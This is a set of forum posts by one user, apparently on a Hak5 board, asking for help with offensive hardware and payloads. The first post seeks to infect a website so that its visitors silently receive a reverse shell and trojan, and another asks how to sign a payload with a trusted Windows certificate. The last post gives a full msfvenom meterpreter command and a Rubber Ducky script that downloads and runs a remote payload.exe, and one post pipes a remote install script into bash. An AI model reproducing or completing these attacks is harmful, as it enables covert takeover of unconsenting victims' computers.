hanshaze

Hello everybody...... I have recently added a domain and some webspace ..... my goal is now to get a reverseshell to the visitor of that page! that means i have to infect this site in the way that if someone calls the he gets pwnd! and best without big spectacle and 3000 confirmations to be rallay really shure to install my trojan! My LHOST is a Pi 2 with Kali! To generate my code i use ps1encode! What output file format do i need to take? php? js? html? acab? Please help! On the server lie otherwise no further files! 2. Question: How or where or with what do I hide the code properly? Is there something like a directive line? Do i MUST use beef-xss` or is there another way to bypass user-confirmation? who can help?

oops.....wrong Pic!

I have just reset my bashbunny and since then, my explorer shows me this! what's up?

Can someone tell me what I have to make so I can read the output of my decoding? That would be cool.......;-P

Thanks for your answer...... Yes, the LT is plugged to a direct power source..... So at least one of the two IPs should be achievable, but this is not the case... Do i have to forward Port 22 for 172.16.84.1? Or for 192.168.178.xx? For now this is the output of my screen

My goal is to make my LanTurtle accessible over the entire LAN or the very best in the WAN. For this I proceed as follows Step 1: Without LanTurtle plugged in -> Windows 10 -> ipconfig Step 2: LanTurtle via Ethernet cable cable to the router, other side --> USB at the laptop -> ipconfig Step 3 SSH into the LanTurtle Step 4: Update modules Now, if i plug out the LanTurtle after Step 4 and connect it to the LAN like in those two Pics below i cant receive the LanTurtle over LAN anything else.... What is my fault?

Hi....can anyone give me a description how to sign my payload with a trusted Windows certificate? A link to a tutorial would be cool! Thank you!

Thank you!

I hope someone can help .... I have a wifi pineapple nano,with a 16 gigabyte sd card is! All modules installed on the nano have been installed in the sd-dir. Without exception! When I, however, via ssh wget -qO- https://raw.githubusercontent.com/kbeflo/wifite-openwrt/master/INSTALL.sh | Bash -s - -v -v I received the message ---> on the device is no more space left! How do I clean up the pineapple-disk? and how do i install wifite in the sd dir? Respect for the entire hak5 workforce! You are mad!

Hi.......i have a problem, hope somebody can help me! Ok,....... I have created a Reverse TCP DNS payload with MSFVenom...... Now i want to execute this File with plugging in the USB Rubber Ducky! How i got to do this? Do i have to convert my Payload with Base64? And if yes, how i could do this? Please help me!

Hello.... i have a question about the USB Rubber Ducky... Hope you can help me! My attack computer is a Raspberry Pi 2 with Raspbian installed. My victim PC is a Windows 10 Notebook. I want to get a meterpreter reverse tcp-session to my Raspberry Pi from the victim if i plug in my USB Rubber Ducky into the Windows PC. As i proceeded: 1. i created the “payload.exe” on the Raspberry Pi ~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.178.35 LPORT=443 -f exe -o /home/pi/payload.exe 2. i created a listener file and run it on the Raspberry Pi ~$ sudo nano /home/pi/listener.rc To test how things work I have saved the “payload.exe” on the victim machine's hdd and run it as the systemadministrator . This is was happened on the Pi's screen: so far so good..... My idea now was to let the USB Rubber Ducky do two things for me after plug-in 1. download my “payload.exe” from the internet 2. install it on the victim-pc with admin rights so i created a “inject.bin” with the Duck Toolkit Encoder. This is the Code i used (changed the download URL to an existing) DELAY 500 CONTROL ESCAPE DELAY 200 STRING cmd.exe DELAY 100 ENTER DELAY 500 STRING cd %TEMP% DELAY 100 ENTER DELAY 100 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://.....payload.exe,%TEMP%\payload.exe'); Start-Process "%TEMP%\payload.exe" DELAY 100 ENTER DELAY 100 ALT SPACE DELAY 50 DOWN DELAY 50 DOWN DELAY 50 DOWN DELAY 50 DOWN DELAY 50 DOWN DELAY 50 ENTER DELAY 50 GUI d Now, the code runs through without any errors, if i plug in the Rubber Ducky. But the problem is that meterpreter gets no connection with the Ducky! Why my DuckyScript doesnt execute the downloaded file? I dont understand whats my fault! Whats wrong? Please help me! Greetings to Darren and the whole hak5-Team!